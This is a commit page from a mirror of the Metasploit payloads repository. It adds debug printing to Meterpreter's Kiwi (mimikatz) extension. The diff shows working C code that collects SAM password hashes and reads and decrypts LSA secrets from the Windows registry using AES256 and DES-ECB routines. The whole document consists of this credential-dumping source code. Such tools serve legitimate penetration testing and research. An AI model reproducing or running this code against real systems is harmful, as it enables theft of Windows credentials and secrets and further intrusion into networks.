github/metasploit-payloads
1
Fork 0
mirror of https://github.com/rapid7/metasploit-payloads synced 2024-12-02 20:36:40 +01:00
Code Releases Activity

Added a stack of debug output

Browse Source
This commit is contained in:
OJ 2014-03-28 16:12:29 +10:00
parent 5988a9dbad
commit 0a8e022f41
2 changed files with 26 additions and 2 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

4
c/meterpreter/source/extensions/kiwi/mimikatz/mimikatz_interface.c
View File

@ -539,7 +539,7 @@ VOID sam_hash_handler(LPVOID lpContext, DWORD dwRid, wchar_t* lpwUser, DWORD dwU
dprintf("[KIWI SAM] Made it here");
// only add the result if we have one of the hashes and a user name.
if ((hasLmHash || hasNtlmHash) && lpwUser)
if (lpwUser)
{
dprintf("[KIWI SAM] Adding %S rid %u (%x)", lpwUser, dwRid, dwRid);
@ -561,7 +561,7 @@ VOID sam_hash_handler(LPVOID lpContext, DWORD dwRid, wchar_t* lpwUser, DWORD dwU
}
else
{
dprintf("[KIWI SAM] Ignoring %S, no hashes given");
dprintf("[KIWI SAM] Ignoring %u, no user name", dwRid);
}
}

24
c/meterpreter/source/extensions/kiwi/mimikatz/modules/kuhl_m_lsadump.c
View File

@ -594,13 +594,20 @@ BOOL kuhl_m_lsadump_getSecrets(IN PKULL_M_REGISTRY_HANDLE hSecurity, IN HKEY hPo
}
kull_m_registry_RegCloseKey(hSecurity, hValue);
}
kprintf(L"****************** Trying for the OLD value *******************");
if(kull_m_registry_RegOpenKeyEx(hSecurity, hSecret, L"OldVal", 0, KEY_READ, &hValue))
{
kprintf(L"Reg key opened");
if(kuhl_m_lsadump_decryptSecret(hSecurity, hValue, lsaKeysStream, lsaKeyUnique, &pOld, &dwOldSize))
{
kprintf(L"secret decrypted");
kuhl_m_lsadump_candidateSecret(dwOldSize, pOld, L"\nold/");
kprintf(L"dumped");
}
kprintf(L"closing");
kull_m_registry_RegCloseKey(hSecurity, hValue);
kprintf(L"closed");
}
kull_m_registry_RegCloseKey(hSecurity, hSecret);
}
@ -773,19 +780,26 @@ BOOL kuhl_m_lsadump_decryptSecret(IN PKULL_M_REGISTRY_HANDLE hSecurity, IN HKEY
PBYTE secret;
CRYPTO_BUFFER data, output = {0, 0, NULL}, key = {sizeof(NT5_SYSTEM_KEY), sizeof(NT5_SYSTEM_KEY), NULL};
kprintf(L"Decrypting secret");
if(kull_m_registry_RegQueryValueEx(hSecurity, hSecret, NULL, 0, NULL, NULL, &szSecret))
{
kprintf(L"Secret size value queried");
if(secret = (PBYTE) LocalAlloc(LPTR, szSecret))
{
kprintf(L"Memory allocated");
if(kull_m_registry_RegQueryValueEx(hSecurity, hSecret, NULL, 0, NULL, secret, &szSecret))
{
kprintf(L"Secret value queried");
if(lsaKeysStream)
{
kprintf(L"Key stream present");
if(kuhl_m_lsadump_sec_aes256((PNT6_HARD_SECRET) secret, szSecret, lsaKeysStream, NULL))
{
kprintf(L"pulled aes256");
*pSzBufferOut = ((PNT6_HARD_SECRET) secret)->clearSecret.SecretSize;
if(*pBufferOut = LocalAlloc(LPTR, *pSzBufferOut))
{
kprintf(L"copying secret");
status = TRUE;
RtlCopyMemory(*pBufferOut, ((PNT6_HARD_SECRET) secret)->clearSecret.Secret, *pSzBufferOut);
}
@ -793,32 +807,42 @@ BOOL kuhl_m_lsadump_decryptSecret(IN PKULL_M_REGISTRY_HANDLE hSecurity, IN HKEY
}
else if(lsaKeyUnique)
{
kprintf(L"unique present");
key.Buffer = lsaKeyUnique->key;
data.Length = data.MaximumLength = ((PNT5_HARD_SECRET) secret)->encryptedStructSize;
data.Buffer = ((PNT5_HARD_SECRET) secret)->encryptedSecret;
kprintf(L"Decrypting DES %p %p %p", &data, &key, &output);
if(RtlDecryptDESblocksECB(&data, &key, &output) == STATUS_BUFFER_TOO_SMALL)
{
kprintf(L"Decrypted");
if(output.Buffer = (PBYTE) LocalAlloc(LPTR, output.Length))
{
kprintf(L"Decrypting ECB block");
output.MaximumLength = output.Length;
if(NT_SUCCESS(RtlDecryptDESblocksECB(&data, &key, &output)))
{
*pSzBufferOut = output.Length;
if(*pBufferOut = LocalAlloc(LPTR, *pSzBufferOut))
{
kprintf(L"Copying value");
status = TRUE;
RtlCopyMemory(*pBufferOut, output.Buffer, *pSzBufferOut);
}
else PRINT_ERROR(L"LocalAlloc failed - pBufferOut");
}
else PRINT_ERROR(L"Decrypt DES block failed");
LocalFree(output.Buffer);
}
else PRINT_ERROR(L"LocalAlloc failed - output.Buffer");
}
else PRINT_ERROR(L"Unexpected result from RtlDecryptDESblocksECB");
}
}
else PRINT_ERROR(L"kull_m_registry_RegQueryValueEx Secret value KO\n");
LocalFree(secret);
}
else PRINT_ERROR(L"LocalAlloc failed - Secret");
}
else PRINT_ERROR(L"pre - kull_m_registry_RegQueryValueEx Secret value KO\n");